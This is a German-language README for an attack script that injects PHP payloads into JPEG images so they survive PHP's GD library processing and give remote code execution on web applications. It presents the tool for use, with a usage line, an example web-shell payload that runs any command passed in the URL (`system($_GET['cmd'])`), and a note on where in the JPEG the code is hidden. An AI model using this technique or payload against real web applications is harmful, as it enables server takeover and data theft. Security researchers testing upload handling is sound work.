
Injiziert PHP-Payloads in JPEG-Bilder zur Ausnutzung von Webanwendungen, umgeht die Bildverarbeitung der GD-Bibliothek und erreicht Remote-Code-Ausführung.
Injiziert PHP-Payloads in JPEG-Bilder. Verwandt mit diesem Beitrag.
Sie haben eine Webanwendung, die ein JPEG-Bild durch die GD-Grafikbibliothek von PHP ausführt.
Dieses Skript injiziert PHP-Code in ein angegebenes JPEG-Bild. Die Webanwendung führt den Payload aus, wenn sie das Bild interpretiert. Stellen Sie sicher, dass Ihr eingegebenes JPEG unkomprimiert ist!
python3 gd-jpeg.py [JPEG] [PAYLOAD] [OUTPUT_JPEG]
z.B. python3 gd-jpeg.py cat.jpeg '<?php system($_GET["cmd"]);?>' infected_cat.jpeg
PHP-Code wird in den Null-/Müllbereich (braun) nach dem Scan-Header injiziert:
Das neue infizierte JPEG wird durch die GD-Bibliothek von PHP ausgeführt. PHP interpretiert den in das JPEG injizierten Payload und führt ihn aus.